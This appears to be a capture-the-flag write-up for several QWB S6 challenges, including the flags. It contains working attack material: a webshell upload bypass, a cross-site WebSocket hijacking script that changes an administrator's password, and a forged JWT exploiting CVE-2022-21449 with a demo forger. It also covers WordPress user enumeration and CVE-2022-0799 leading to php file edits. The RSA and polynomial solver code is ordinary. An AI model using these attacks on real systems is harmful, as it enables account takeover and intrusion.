MISC check-in
Flag value:
flag{we1come_t0_qwb_s6}
Strong Net Pioneer rcefile
After many upload tests it turned out that only files in image format can be uploaded; php, php5 and similar extensions are rejected. This can be bypassed with the following upload: the file type is checked, so the extension just has to be changed to jpg, after which the file is uploaded and the webshell connects successfully.
AntSword connects successfully.
Move up the directory tree and find the flag.
flag value:
flag{5d3c9f27-e8fe-4e5d-9a2d-4e907a32adec}
Web babyweb
First register an account. The site is a chat bot; following the prompts and sending help shows two functions: changepw, which changes the password, and a bug report that is submitted to the administrator. I tried XSS, which seemed useless. Capturing the traffic with Burp shows that the chat runs over a WebSocket.
A Baidu search turned up cross-site WebSocket hijacking. Combining that with the password change and the fact that the administrator reviews the reports, experience from similar challenges suggests the route is to change the administrator's password and thereby obtain administrator privileges.
So the direction is clear: it is very similar to CSRF, and we start to prepare.
We need a way to make the administrator open a page we construct that changes the password:
<script>
var url = "ws://127.0.0.1:8888/bot"; // 8888 is the port given in the challenge
var ws = new WebSocket(url);
ws.onopen = function(e) {
    ws.send("changepw 12345");
};
</script>
Host this page on an external server and submit its URL to the administrator through bugreport on the vulnerability submission interface. When the administrator's browser opens the page, the script connects to the bot from the administrator's own session and sends the password-change command.
Then log in to the administrator account with the new password: success.
There is another layer. After buying a hint it turns out to be source code; audit the code and capture the requests with Burp.
The flag is obtained successfully.
flag value:
flag{617a3096-f514-4e7d-9472-e98924fbbec7}
Strong Net Pioneer ASR
import gmpy2

n = 8250871280281573979365095715711359115372504458973444367083195431861307534563246537364248104106494598081988216584432003199198805753721448450911308558041115465900179230798939615583517756265557814710419157462721793864532239042758808298575522666358352726060578194045804198551989679722201244547561044646931280001
# iroot returns (root, exact); exact is True here because n is a perfect square
a, exact = gmpy2.iroot(n, 2)
print(a)
First take the integer square root of n with gmpy2: n is a perfect square, and its root a (the product of the four primes that make up the modulus) is
a = 2872432989693854281918578458293603200587306199407874717707522587993136874097838265650829958344702997782980206004276973399784460125581362617464018665640001
Then factor this number with yafu. Among its prime factors are
p = 260594583349478633632570848336184053653
q = 223213222467584072959434495118689164399
Run the script below to get m. It decrypts modulo p^2 q^2 only: c mod p^2 q^2 equals m^e mod p^2 q^2, phi(p^2 q^2) = p(p-1)q(q-1), and since m < p^2 q^2 the result is m itself, so the other two factors are not needed.
from Crypto.Util.number import inverse

p = 260594583349478633632570848336184053653
q = 223213222467584072959434495118689164399
# the other two factors of a reported by yafu; not needed for the decryption below
#r = 218566259296037866647273372633238739089
#s = 225933944608558304529179430753170813347
e = 3
phi = p * (p - 1) * q * (q - 1)   # phi(p^2 q^2)
d = inverse(e, phi)
n = p * p * q * q                 # decrypt modulo p^2 q^2, which is larger than m
c = 945272793717722090962030960824180726576357481511799904903841312265308706852971155205003971821843069272938250385935597609059700446530436381124650731751982419593070224310399320617914955227288662661442416421725698368791013785074809691867988444306279231013360024747585261790352627234450209996422862329513284149
m = pow(c, d, n)
#m = 1248984295174749683050825615411469211061247361327166117293032213981703895553936323127707213641064897178474925251326429742817744892644764737209862
flag = m.to_bytes(64, byteorder='big')
print(flag)
Flag value:
flag{Fear_can_hold_you_prisoner_Hope_can_set_you_free}
Crypto myJWT
JWT with an ECDSA signature.
A token consists of three parts: the base64 of the header, the base64 of the payload, and the signature.
From the given source code the header is left unchanged; in the payload, name must be administrator and admin must be true at the same time.
According to the token it gives, we base64 decode it to get the header and payload:
{"typ":"JWT","alg":"myES"}
{"iss":"qwb","name":"administrator","admin":false,"exp":1659241547664}
Change the payload to
{"iss":"qwb","name":"administrator","admin":true,"exp":165924154766400}
At the same time, from the source code and a property of the ECDSA verification it uses, we replace the third part (the signature) with the base64 string 'AAA=', which decodes to two zero bytes, i.e. a signature with r = 0 and s = 0. As the flag spells out, this is CVE-2022-21449: an ECDSA verifier that does not check that r and s lie in [1, n-1] accepts the all-zero signature for any message under any key.
The resulting token:
eyJ0eXAiOiJKV1QiLCJhbGciOiJteUVTIn0=.eyJpc3MiOiJxd2IiLCJuYW1lIjoiYWRtaW5pc3RyYXRvciIsImFkbWluIjp0cnVlLCJleHAiOjE2NTkyNDE1NDc2NjQwMH0=.AAA=
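The following is an added example, not the challenge's source and not from the original writeup: a pure-Python ECDSA verifier that reproduces the failure mode behind CVE-2022-21449 next to the corrected one, plus a builder that emits a token in the challenge's format (padded standard base64 for all three parts) so the forged token above can be regenerated. The curve (secp256k1), the modelling of the flawed verifier (a Fermat-style inverse that returns 0 for s = 0, and the point at infinity reported with x = 0) and the toy key and nonce are my choices for the demonstration; the real bug was in Java's EC code and affected every curve it supported.

```python
import base64
import hashlib
import json

# secp256k1 parameters (public constants); picked because a = 0 keeps the arithmetic short.
P = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFC2F
N = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141
G = (0x79BE667EF9DCBBAC55A06295CE870B07029BFCDB2DCE28D959F2815B16F81798,
     0x483ADA7726A3C4655DA4FBFC0E1108A8FD17B448A68554199C47D08FFB10D4B8)
INF = None  # point at infinity


def ec_add(A, B):
    """Affine addition on y^2 = x^3 + 7 over GF(P)."""
    if A is INF:
        return B
    if B is INF:
        return A
    (x1, y1), (x2, y2) = A, B
    if x1 == x2:
        if (y1 + y2) % P == 0:
            return INF
        lam = 3 * x1 * x1 * pow(2 * y1, -1, P) % P
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return (x3, (lam * (x1 - x3) - y1) % P)


def ec_mul(k, A):
    """Double-and-add; ec_mul(0, A) is the point at infinity."""
    R = INF
    while k:
        if k & 1:
            R = ec_add(R, A)
        A = ec_add(A, A)
        k >>= 1
    return R


def msg_hash(msg):
    return int.from_bytes(hashlib.sha256(msg).digest(), "big") % N


def ecdsa_sign(priv, msg, k):
    """Textbook ECDSA; k must be a fresh secret nonce (fixed by the caller only for the demo)."""
    r = ec_mul(k, G)[0] % N
    s = pow(k, -1, N) * (msg_hash(msg) + r * priv) % N
    return r, s


def verify_vulnerable(pub, msg, sig):
    """Verification without the range check on (r, s), modelled on CVE-2022-21449: the
    Fermat inverse of 0 is 0, so u1 = u2 = 0, R is the point at infinity, and its
    x-coordinate is reported as 0, which matches r = 0."""
    r, s = sig
    w = pow(s, N - 2, N)
    u1, u2 = msg_hash(msg) * w % N, r * w % N
    R = ec_add(ec_mul(u1, G), ec_mul(u2, pub))
    x = 0 if R is INF else R[0]
    return x % N == r


def verify_fixed(pub, msg, sig):
    """The check the standard requires: r and s must lie in [1, N-1] before any arithmetic."""
    r, s = sig
    if not (1 <= r < N and 1 <= s < N):
        return False
    return verify_vulnerable(pub, msg, sig)


def b64(data):
    return base64.b64encode(data).decode()


def build_token(header, payload, sig_bytes):
    """Token in the challenge's format: padded standard base64 for all three parts."""
    enc = lambda obj: b64(json.dumps(obj, separators=(",", ":")).encode())
    return ".".join([enc(header), enc(payload), b64(sig_bytes)])


def forge_admin_token():
    header = {"typ": "JWT", "alg": "myES"}
    payload = {"iss": "qwb", "name": "administrator", "admin": True, "exp": 165924154766400}
    return build_token(header, payload, b"\x00\x00")  # "AAA=" is two zero bytes: r = s = 0


def demo():
    priv, k = 0x123456789ABCDEF0, 0x0FEDCBA987654321  # constructed toy key and nonce
    pub = ec_mul(priv, G)
    token = forge_admin_token()
    signing_input = token.rsplit(".", 1)[0].encode()
    genuine = ecdsa_sign(priv, signing_input, k)
    return {"genuine_vulnerable": verify_vulnerable(pub, signing_input, genuine),
            "genuine_fixed": verify_fixed(pub, signing_input, genuine),
            "zero_vulnerable": verify_vulnerable(pub, signing_input, (0, 0)),
            "zero_fixed": verify_fixed(pub, signing_input, (0, 0))}
```

The genuine signature passes both verifiers; the (0, 0) signature passes only the one that skips the range check, and it does so for every message and every public key, which is why the forged token needs nothing but the base64 of two zero bytes in its third part.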
Flag value
flag{cve-2022-21449_Secur1ty_0f_c0de_1mplementation}
Strong Net Pioneer polydiv
task.py shows that the server has two layers. The first is a proof of work: it gives a sha256 digest and the last 16 characters of the preimage, and the unknown first four characters are found directly by brute force:
import hashlib
from itertools import product

ss = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'
txt2 = "T9up62MRPNfO53WN"   # the 16 known characters printed by the server
sha256enc = "ab79fb51140b7edd2b9010e0c5a4f4fe3ff73c68c17f5fb1264de03b0388cda7"   # the target digest
key = txt2
# product() enumerates all 62^4 four-character prefixes; a single break then ends the search
for a, b, c, d in product(ss, repeat=4):
    code = a + b + c + d
    encinfo = hashlib.sha256((code + key).encode()).hexdigest()
    if encinfo == sha256enc:
        print(code)
        print(encinfo)
        break
The second layer is 40 rounds of polynomial arithmetic, which we also solve by brute force.
Poly2.py defines polynomial addition and multiplication. A short analysis shows they are polynomials over GF(2): only terms with coefficient 1 are kept, and the third way of defining a polynomial (listing the degrees of the nonzero terms) is the convenient one. In the rounds observed the degree of r(x) is at most 14 and the degree of a(x) is at most 7, so b(x) has degree at most 7, and every candidate b(x) can be found by enumerating the sets of term degrees drawn from {0, ..., 7}. A script for a single round:
class Polynomial2():
    '''
    Polynomial ring over GF(2). A polynomial can be defined in three ways:
    1. a list of coefficients, highest degree first
    >>> Polynomial2([1,1,0,1])
    x^3 + x^2 + 1
    2. a 0/1 string
    >>> Polynomial2('1101')
    x^3 + x^2 + 1
    3. the degrees of the terms whose coefficient is 1
    >>> Poly([3,1,4])
    x^4 + x^3 + x
    >>> Poly([]) # additive identity
    0
    >>> Poly(0) # multiplicative identity
    1
    >>> Poly(1,2) * Poly(2,3)
    x^5 + x^3
    '''
    def __init__(self, ll):
        if type(ll) == str:
            ll = list(map(int, ll))
        self.param = ll[::-1]
        self.ones = [i for i in range(len(self.param)) if self.param[i] == 1]  # degrees of the terms with coefficient 1
        self.Latex = self.latex()
        self.b = ''.join([str(i) for i in ll])  # coefficients as a 0/1 string
        self.order = 0  # highest degree
        try:
            self.order = max(self.ones)
        except:
            pass

    def format(self, reverse=True):
        '''
        Pretty-print. By default the highest degree is on the left;
        with reverse=False the lowest degree is on the left.
        Note that a polynomial can only be defined with the highest degree first.
        '''
        if len(self.ones) == 0:
            return '0'
        if reverse:
            return (' + '.join(f'x^{i}' for i in self.ones[::-1]) + ' ').replace('x^0', '1').replace('x^1 ', 'x ').strip()
        return (' + '.join(f'x^{i}' for i in self.ones) + ' ').replace('x^0', '1').replace('x^1 ', 'x ').strip()

    def __call__(self, x):
        '''
        Evaluation is not implemented; it is not needed.
        '''
        print(f'call({x})')

    def __add__(self, other):
        '''
        Polynomial addition: coefficient-wise XOR
        '''
        a, b = self.param[::-1], other.param[::-1]
        if len(a) < len(b):
            a, b = b, a
        for i in range(len(a)):
            try:
                a[-1 - i] = (b[-1 - i] + a[-1 - i]) % 2
            except:
                break
        return Polynomial2(a)

    def __mul__(self, other):
        '''
        Polynomial multiplication: shift-and-add over GF(2)
        '''
        a, b = self.param[::-1], other.param[::-1]
        r = [0 for i in range(len(a) + len(b) - 1)]
        for i in range(len(b)):
            if b[-i - 1] == 1:
                if i != 0:
                    sa = a + [0] * i
                else:
                    sa = a
                sa = [0] * (len(r) - len(sa)) + sa
                r = [(r[t] + sa[t]) % 2 for t in range(len(r))]
        return Polynomial2(r)

    def __sub__(self, oo):
        # over GF(2) subtraction is the same as addition
        return self + oo

    def __repr__(self) -> str:
        return self.format()

    def __str__(self) -> str:
        return self.format()

    def __pow__(self, a):
        # no large exponents are needed, so no fast exponentiation
        t = Polynomial2([1])
        for i in range(a):
            t *= self
        return t

    def latex(self, reverse=True):
        '''
        LaTeX-style printing: exponents with two or more digits are wrapped in {}
        '''
        def latex_pow(x):
            if len(str(x)) <= 1:
                return str(x)
            return '{' + str(x) + '}'
        if len(self.ones) == 0:
            return '0'
        if reverse:
            return (' + '.join(f'x^{latex_pow(i)}' for i in self.ones[::-1]) + ' ').replace('x^0', '1').replace(' x^1 ', ' x ').strip()
        return (' + '.join(f'x^{latex_pow(i)}' for i in self.ones) + ' ').replace('x^0', '1').replace(' x^1 ', ' x ').strip()

    def __eq__(self, other):
        return self.ones == other.ones

    def __lt__(self, other):
        return max(self.ones) < max(other.ones)

    def __le__(self, other):
        return max(self.ones) <= max(other.ones)


def Poly(*args):
    '''
    Alternative constructor: Poly([3,1,4]) or Poly(3,1,4)
    '''
    if len(args) == 1 and type(args[0]) in [list, tuple]:
        args = args[0]
    if len(args) == 0:
        return Polynomial2('0')
    ll = [0 for i in range(max(args) + 1)]
    for i in args:
        ll[i] = 1
    return Polynomial2(ll[::-1])


PP = Polynomial2
P = Poly
# short aliases; P and PP are told apart by their length


if __name__ == '__main__':
    from itertools import combinations
    # one round: r(x) = a(x) * b(x) + c(x); find b(x)
    pr = Poly([14, 13, 12, 8, 5, 2, 0])
    pa = Poly([7, 6, 4, 3, 2])
    pc = Poly([6, 4, 0])
    # b(x) has degree at most 7: try every non-empty set of term degrees from {0, ..., 7},
    # one term first, then two, and so on (255 candidates at most)
    found = None
    for k in range(1, 9):
        for degs in combinations(range(8), k):
            bx = Poly(degs)
            if bx * pa + pc == pr:
                found = bx
                break
        if found is not None:
            break
    print(found)
The challenge has 40 rounds; entering them by hand is too slow, so write an automated submission script:
import hashlib
from itertools import combinations, product
from pwn import *
from Poly2 import Polynomial2, Poly   # the challenge's Poly2.py, i.e. the class listed above

ss = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'


def talk_with_server(known, shaenc):
    # layer 1: brute-force the four unknown characters in sha256(XXXX + known)
    for a, b, c, d in product(ss, repeat=4):
        code = a + b + c + d
        encinfo = hashlib.sha256((code + known).encode()).hexdigest()
        if encinfo == shaenc:
            print('code', code)
            print(encinfo)
            return code


def get_bx(r1, a1, c1):
    # layer 2: find b(x) with r(x) = a(x) * b(x) + c(x); b(x) has degree at most 7,
    # so try every non-empty set of term degrees drawn from {0, ..., 7}
    pr = Poly(r1)
    pa = Poly(a1)
    pc = Poly(c1)
    print(pr)
    for k in range(1, 9):
        for degs in combinations(range(8), k):
            bx = Poly(degs)
            if bx * pa + pc == pr:
                print(bx)
                return bx


def parse_poly(d, ply, maxdeg):
    # record the degree of every term of a polynomial printed as 'x^14 + x^3 + x + 1';
    # d is keyed by (maxdeg - degree) so that list(d.values()) lists the degrees
    for term in str(ply).replace(' ', '').split('+'):
        if term in ('', '0'):
            continue
        if term == '1':
            deg = 0
        elif term == 'x':
            deg = 1
        else:
            deg = int(term[2:])
        d[maxdeg - deg] = deg


if __name__ == '__main__':
    a1 = {}
    r1 = {}
    c1 = {}
    p = remote("182.92.223.176", 25342)
    p.recvuntil("sha256(XXXX+")
    # str() of the received bytes gives "b'...'", so [2:-1] strips the repr wrapper
    given = str(p.recv(16).strip())
    print('given', given, type(given), len(given))
    given = given[2:-1]
    print('given', given, type(given), len(given))
    p.recv(5)
    sha256enc = str(p.recv(64))
    sha256enc = sha256enc[2:-1]
    print(given, sha256enc)
    print(p.recvuntil(" XXXX:"))
    XXXX = talk_with_server(given, sha256enc)
    print(XXXX)
    p.sendline(str(XXXX))
    j = 0
    while j < 45:
        # each line arrives as "b'<label> <polynomial>\n'"; the slices drop the repr wrapper,
        # the label printed by the server (one character longer on the very first line) and the newline
        rx = str(p.recvline())
        print(rx)
        if j > 0:
            print(str(rx[9:-3]))
            parse_poly(r1, str(rx[9:-3]), 14)
        else:
            print(str(rx[10:-3]))
            parse_poly(r1, str(rx[10:-3]), 14)
        ax = str(p.recvline())
        print(ax)
        print(str(ax[9:-3]))
        cx = str(p.recvline())
        print(cx)
        print(str(cx[9:-3]))
        j += 1
        parse_poly(a1, str(ax[9:-3]), 7)
        parse_poly(c1, str(cx[9:-3]), 6)
        print('rx:', type(r1.values()), list(r1.values()))
        print('ax-:', a1.values())
        print('cx-:', c1.values())
        p.recvline()
        bx = get_bx(list(r1.values()), list(a1.values()), list(c1.values()))
        print(bx)
        p.sendline(str(bx))
        print(p.recvline())
        print('done', j)
        a1 = {}
        r1 = {}
        c1 = {}
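The following is an added example, mine rather than the writeup's or the challenge's Poly2.py, showing the direct way to answer each round. Since r(x) = a(x) * b(x) + c(x) over GF(2), b(x) is the exact quotient (r(x) - c(x)) / a(x), so one polynomial long division replaces the candidate enumeration and carries no degree-7 limit. Polynomials are held as Python ints (bit i set means the term x^i), the parser accepts the 'x^14 + x^3 + x + 1' notation the server prints, and the sample values are the round quoted in the single-round script above.

```python
def parse_poly(text):
    """'x^14 + x^3 + x + 1' (the form the server prints) -> int with bit i set for each x^i."""
    mask = 0
    for term in text.replace(" ", "").split("+"):
        if term in ("", "0"):
            continue
        if term == "1":
            mask |= 1
        elif term == "x":
            mask |= 2
        elif term.startswith("x^"):
            mask |= 1 << int(term[2:])
        else:
            raise ValueError(f"bad term {term!r}")
    return mask


def fmt_poly(mask):
    """Inverse of parse_poly: highest degree first, in the server's notation."""
    if mask == 0:
        return "0"
    terms = []
    for i in range(mask.bit_length() - 1, -1, -1):
        if mask >> i & 1:
            terms.append("1" if i == 0 else "x" if i == 1 else f"x^{i}")
    return " + ".join(terms)


def gf2_mul(a, b):
    """Carry-less multiplication: product of two GF(2)[x] polynomials."""
    r = 0
    while b:
        if b & 1:
            r ^= a
        a <<= 1
        b >>= 1
    return r


def gf2_divmod(num, den):
    """Polynomial long division over GF(2): returns (quotient, remainder)."""
    if den == 0:
        raise ZeroDivisionError("division by the zero polynomial")
    q = 0
    dd = den.bit_length()
    while num and num.bit_length() >= dd:
        shift = num.bit_length() - dd     # align the divisor's leading term
        q |= 1 << shift
        num ^= den << shift               # subtraction is XOR over GF(2)
    return q, num


def solve_round(r_text, a_text, c_text):
    """Given r(x), a(x), c(x) with r = a*b + c, return b(x) as the server expects it."""
    r, a, c = (parse_poly(t) for t in (r_text, a_text, c_text))
    b, rem = gf2_divmod(r ^ c, a)         # r - c == r ^ c over GF(2)
    if rem:
        raise ValueError("r(x) - c(x) is not divisible by a(x); check the parsed inputs")
    assert gf2_mul(a, b) ^ c == r         # cross-check before answering
    return fmt_poly(b)


# The round quoted in the single-round script above
SAMPLE_R = "x^14 + x^13 + x^12 + x^8 + x^5 + x^2 + 1"
SAMPLE_A = "x^7 + x^6 + x^4 + x^3 + x^2"
SAMPLE_C = "x^6 + x^4 + 1"
```

The remainder check doubles as an input validator: a parsing slip (for instance a misread label offset) almost always produces a non-zero remainder, which is a clearer failure than the enumeration silently finding nothing.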
Flag value:
flag{c0923e5c-805c-42e3-91c3-160dceb41979}
WEB Crash
The hint says the flag is on the 504 page, so the request has to make the web page time out. I took a payload from the internet and adapted it.
Then send it from several Burp Repeater tabs at once, repeating many times, and it eventually succeeds.
Flag value
flag{467e093c-08a5-4925-bdb8-cfa9eaa4506b}
Strong Net Pioneer WP_um
The challenge page gives some hints. After installing WordPress, scan it with wpscan,
which finds the user name MaoGePaMao.
The password hint shown during installation follows this rule:
Exploit CVE-2022-0799
to get the password MaoGeYaoQiFeiLa
and enter the admin backend.
With the password, log in to the admin backend, modify one of the php files, save it and access it.